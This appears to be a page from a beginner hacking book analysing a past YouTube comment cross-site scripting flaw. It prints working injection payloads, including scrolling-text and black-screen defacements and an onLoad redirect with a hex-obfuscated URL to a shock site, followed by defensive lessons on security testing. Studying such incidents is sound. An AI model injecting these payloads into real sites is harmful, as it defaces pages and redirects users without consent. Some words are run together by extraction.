Hacking For Beginners – Manthan Desai

In its simple form, the user would put in a comment such as this one:

2010

<script><h1><marquee><font color=”red”><u>Ha -Ha – This text will scroll in red, on your screen</script> In this particular attack, the keyword IF_HTML_FUNCTION? Appears after the <script> tag, in the following way:

<Script>IF_HTML_FUNCTION? <h1><marquee><font color=”red”><u>Ha -Ha – This text will scroll in red, on yourscreen<script>

Apart from this keyword, I also noticed that the <script> tag is not properly closed. This is probably what caused otherscripts on the same page to stop functioning.

During the time the YouTube was vulnerable users began creating variants of the marquee script, one of which wouldredirect users to go at an infamous hacker web site, as can be seen below.

<script><BODY onLoad=”var a = ‘ \x68\x74\x74\x70\x3a\x2f\ x2f’ + ‘ \x77\x77\x77\ x2e’ ‘goatse’ + ‘ \ x2efr’;location.href = a;”

One thing to note about this attack script is that the IF_HTML_FUNCTION? Is missing, but the <script> tag is still notproperly closed.

Videos emerged of other users experimenting with this newly discovered flaw. One user made a video of himselfexploiting the following script, which will have the effect of making the page black, except for the words *TEXTHERE*:

<script><h1><marquee style=”position: absolute; top: 0px; 0px; left: 0px; z-index: 9999999; right: 0px;background-color: rgb(0, 0, 0);”><font style:=”font - size:60px” color=”red”><u style=”">*TEXT HERE*<script>

Similar to the previous two examples, the <script> tag is not closed, and just like the example before this one,the IF_HTML_FUNCTION keyword is missing.

By the time I go around to creating my own experiments, YouTube had already fixed the problem, they also very briefly,and without detailed, admitted to the attack (Google acknowledges YouTube hack.)

The fix was swift and effective, however impeded me from carrying out further tests, so I was not able to determinewhat would happen if, for example the tag was properly terminated.

Lessons Learned and Countermeasures

It is still not clear whether this attack existed for a long time but never noticed, or whether it was a recently introducedbug; hopefully YouTube will explain to us how this XSS vulnerability was made possible.

My gut feeling is that a recent software update introduced this security hole; if this is the case, it reinforces what somesecurity experts are saying; incorporate security test in your QA process, preferably with automated tools such asvulnerability scanners. Security testing and vulnerability scanning are not exercises that are done once and then neveragain. They need to be re-done each time a software update is made to your web apps. In the case of YouTube, this isprobably a daily exercise.

This attack is a stark reminder of how vulnerable Internet users are to XSS attacks. A classic and relatively simple attackworked against the biggest Internet giant. If Google and YouTube cannot keep their users safe, then who can?

“ Warning! Do not use this attack again on youtube and try to hack it as they are back trackingthis type of illegal activities, this is for educational purpos e only”.

www.hackingtech.co.tv

Page 156